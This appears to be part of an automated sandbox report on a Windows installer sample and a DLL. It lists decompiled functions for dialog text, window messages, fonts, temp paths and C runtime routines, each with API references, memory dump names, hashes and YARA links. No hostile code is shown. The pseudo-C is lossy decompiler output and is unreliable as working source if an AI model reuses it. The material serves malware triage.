                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00401CE2
                                                  • GetClientRect.USER32 ref: 00401CEF
                                                  • LoadImageA.USER32 ref: 00401D10
                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                  • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                  • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
                                                  • Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                  • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100026F0, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 157stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: LoadStringlstrcpyn
                                                  • String ID: (%s,%s,%p,%d)$documentation
                                                  • API String ID: 2121282593-3639689978
                                                  • Opcode ID: 98ba3239289e0b240a8c53f47292207050e1ce45298aa1d5c42e23037c28392a
                                                  • Instruction ID: fd03d3c765fbebab6068a98880ea52e749a53358c1f510bc2b13bf7e0e455dfd
                                                  • Opcode Fuzzy Hash: 98ba3239289e0b240a8c53f47292207050e1ce45298aa1d5c42e23037c28392a
                                                  • Instruction Fuzzy Hash: 1D7170B4D082199FDB04DFA9D5857AEBBF0FF48350F10882AE899A7345D7349941CF52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404678, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
			}



















                                                  0x0040467e
                                                  0x00404683
                                                  0x0040468b
                                                  0x0040468c
                                                  0x00404699
                                                  0x004046a1
                                                  0x004046a2
                                                  0x004046a4
                                                  0x004046a6
                                                  0x004046a8
                                                  0x004046ab
                                                  0x004046ab
                                                  0x004046b2
                                                  0x004046b8
                                                  0x004046b8
                                                  0x004046bf
                                                  0x004046c6
                                                  0x004046c9
                                                  0x004046cc
                                                  0x004046cc
                                                  0x004046d0
                                                  0x004046e0
                                                  0x004046e2
                                                  0x004046e5
                                                  0x0040468e
                                                  0x0040468e
                                                  0x00404695
                                                  0x00404695
                                                  0x004046ed
                                                  0x004046f8
                                                  0x0040470e
                                                  0x0040471e
                                                  0x0040473a

                                                  APIs
                                                  • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                  • wsprintfA.USER32 ref: 0040471E
                                                  • SetDlgItemTextA.USER32 ref: 00404731
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                  • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
                                                  • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                  • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 51%
                                                  			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405B25();
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                  0x00401bd3
                                                  0x00401bdf
                                                  0x00401be2
                                                  0x00401beb
                                                  0x00401beb
                                                  0x00401bee
                                                  0x00401bf2
                                                  0x00401bfb
                                                  0x00401bfb
                                                  0x00401bfe
                                                  0x00401c02
                                                  0x00401c04
                                                  0x00401c51
                                                  0x00401c53
                                                  0x00401c5c
                                                  0x00401c64
                                                  0x00401c67
                                                  0x00401c67
                                                  0x00401c70
                                                  0x00000000
                                                  0x00401c06
                                                  0x00401c0d
                                                  0x00401c0f
                                                  0x00401c17
                                                  0x00401c1a
                                                  0x00401c42
                                                  0x00401c76
                                                  0x00401c76
                                                  0x00401c1c
                                                  0x00401c2a
                                                  0x00401c32
                                                  0x00401c35
                                                  0x00401c35
                                                  0x00401c1a
                                                  0x00401c79
                                                  0x00401c7c
                                                  0x00401c82
                                                  0x00402866
                                                  0x00402866
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                  • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
                                                  • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                  • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10004C79, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 16%
                                                  			E10004C79(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}





                                                  0x10004c7d
                                                  0x10004c88
                                                  0x10004c90
                                                  0x10004c9a
                                                  0x10004ca2
                                                  0x00000000
                                                  0x10004ca7
                                                  0x10004ca2
                                                  0x10004cac

                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10004C6E,?,?,10007814,000000FF,0000001E,00000000,00000000,00000000,?,10005B7A), ref: 10004C88
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004C9A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 1646373207-1276376045
                                                  • Opcode ID: cff8e316798ae6f3d71e6cc43d6b6b535b07d30a3db414547cf85322c693f123
                                                  • Instruction ID: 4f9d14caf78538106cc4662b4f2d4ce25a7b6affe099018ac5781bab106ac7c5
                                                  • Opcode Fuzzy Hash: cff8e316798ae6f3d71e6cc43d6b6b535b07d30a3db414547cf85322c693f123
                                                  • Instruction Fuzzy Hash: 72D0127460510CBFFB85DB91CD45FE97BACDB04585F014054FA08E4460DB72CA509695
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004056BA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004056BA(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                  0x004056bb
                                                  0x004056d2
                                                  0x004056da
                                                  0x004056da
                                                  0x004056e2

                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C9
                                                  • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3936084776
                                                  • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                  • Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
                                                  • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                  • Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1000A162, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E1000A162(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				void* __ebx;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E100065B9(_t50,  &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E1000A09D( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E10006E77(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                                                  0x1000a16a
                                                  0x1000a16f
                                                  0x1000a189
                                                  0x00000000
                                                  0x1000a189
                                                  0x1000a171
                                                  0x1000a176
                                                  0x00000000
                                                  0x00000000
                                                  0x1000a17b
                                                  0x1000a198
                                                  0x1000a19d
                                                  0x1000a1a0
                                                  0x1000a1a7
                                                  0x1000a1c6
                                                  0x1000a1cd
                                                  0x1000a1cf
                                                  0x1000a213
                                                  0x1000a222
                                                  0x1000a230
                                                  0x1000a232
                                                  0x1000a242
                                                  0x1000a242
                                                  0x1000a246
                                                  0x1000a248
                                                  0x1000a24b
                                                  0x1000a24b
                                                  0x1000a24b
                                                  0x1000a24b
                                                  0x00000000
                                                  0x1000a251
                                                  0x1000a234
                                                  0x1000a234
                                                  0x1000a239
                                                  0x1000a239
                                                  0x1000a23c
                                                  0x00000000
                                                  0x1000a23c
                                                  0x1000a1d1
                                                  0x1000a1d4
                                                  0x1000a1d8
                                                  0x1000a201
                                                  0x1000a201
                                                  0x1000a204
                                                  0x1000a204
                                                  0x00000000
                                                  0x00000000
                                                  0x1000a206
                                                  0x1000a20a
                                                  0x00000000
                                                  0x00000000
                                                  0x1000a20c
                                                  0x1000a20c
                                                  0x00000000
                                                  0x1000a20c
                                                  0x1000a1da
                                                  0x1000a1dd
                                                  0x00000000
                                                  0x00000000
                                                  0x1000a1e1
                                                  0x1000a1f4
                                                  0x1000a1fa
                                                  0x1000a1fd
                                                  0x1000a1ff
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x1000a1ff
                                                  0x1000a1a9
                                                  0x1000a1ac
                                                  0x1000a1ae
                                                  0x1000a1b3
                                                  0x1000a1b3
                                                  0x1000a1b8
                                                  0x00000000
                                                  0x1000a1b8
                                                  0x1000a17d
                                                  0x1000a182
                                                  0x1000a186
                                                  0x1000a186
                                                  0x00000000

                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000A198
                                                  • __isleadbyte_l.LIBCMT ref: 1000A1C6
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 1000A1F4
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 1000A22A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: d6c83e277bc716ea1591cbdeb936cd6034286e4470041106544bd5c2a02aea49
                                                  • Instruction ID: 4a33cececc37ca35887a08e274e9fae0a72c5d72ee741c232e152da5190e83ac
                                                  • Opcode Fuzzy Hash: d6c83e277bc716ea1591cbdeb936cd6034286e4470041106544bd5c2a02aea49
                                                  • Instruction Fuzzy Hash: B731AD31600246AFEB11CE69CC44AAA7BE5FF42390F128669F865971A5E731E890DB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 1000B9DB, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E1000B9DB(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t28 = __edx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E1000BD64(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					if(_t25 != 0x66) {
						if(_t25 == 0x61 || _t25 == 0x41) {
							_t26 = E1000BE32(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							_t26 = E1000C33B(__edx, __esi, _a4, _a8, _a12, _a20, _a24, _a28);
						}
						L9:
						return _t26;
					} else {
						return E1000C27A(__edx, __esi, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                  0x1000b9db
                                                  0x1000b9de
                                                  0x1000b9e4
                                                  0x1000ba57
                                                  0x00000000
                                                  0x1000b9eb
                                                  0x1000b9ee
                                                  0x1000ba0c
                                                  0x1000ba3e
                                                  0x1000ba13
                                                  0x1000ba25
                                                  0x1000ba25
                                                  0x1000ba5c
                                                  0x1000ba60
                                                  0x1000b9f0
                                                  0x1000ba08
                                                  0x1000ba08
                                                  0x1000b9ee

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                                  • Instruction ID: dbdd0e87cc6380aa5b54e683948d6405aed477d357988d2f8a7b222debf84838
                                                  • Opcode Fuzzy Hash: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                                  • Instruction Fuzzy Hash: 12017E3650054EBBDF129F84CC01CEE3FA2FB19290B048415FE1859039D332DAB1AB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b044->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b054 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b05b = 1;
				 *0x40b058 = _t11 & 0x00000001;
				 *0x40b059 = _t11 & 0x00000002;
				 *0x40b05a = _t11 & 0x00000004;
				E00405BE9(_t18, _t24, _t26, 0x40b060,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b044);
				_push(_t14);
				_push(_t26);
				E00405B25();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                  0x00401d46
                                                  0x00401d5f
                                                  0x00401d69
                                                  0x00401d6e
                                                  0x00401d79
                                                  0x00401d80
                                                  0x00401d92
                                                  0x00401d98
                                                  0x00401d9d
                                                  0x00401da7
                                                  0x004024eb
                                                  0x00401561
                                                  0x00402866
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D3F
                                                  • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                  • CreateFontIndirectA.GDI32(0040B044), ref: 00401DA7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirect
                                                  • String ID:
                                                  • API String ID: 3272661963-0
                                                  • Opcode ID: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                  • Instruction ID: d817c33c406d5a72f0d35d0353d877ca697365183e6ac762242a66cad999de2e
                                                  • Opcode Fuzzy Hash: 8ab92fdc2903857b72d1cffa18b3104b68d957a3c6a7ba5d3e2689a32af85142
                                                  • Instruction Fuzzy Hash: DFF06871A482C0AFE70167709F5AB9B3F64D712305F104476F251BA2E3C77D14448BAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420c48; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42ec2c;
						if(_t2 >  *0x42ec2c) {
							_t3 = CreateDialogParamA( *0x42ec20, 0x6f, 0, E00402B6E, 0);
							 *0x420c48 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F93(0);
					}
				} else {
					_t6 =  *0x420c48; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420c48 = 0;
					return _t6;
				}
			}






                                                  0x00402bf8
                                                  0x00402c12
                                                  0x00402c18
                                                  0x00402c22
                                                  0x00402c28
                                                  0x00402c2e
                                                  0x00402c3f
                                                  0x00402c48
                                                  0x00000000
                                                  0x00402c4d
                                                  0x00402c54
                                                  0x00402c1a
                                                  0x00402c21
                                                  0x00402c21
                                                  0x00402bfa
                                                  0x00402bfa
                                                  0x00402c01
                                                  0x00402c04
                                                  0x00402c04
                                                  0x00402c0a
                                                  0x00402c11
                                                  0x00402c11

                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                  • GetTickCount.KERNEL32 ref: 00402C22
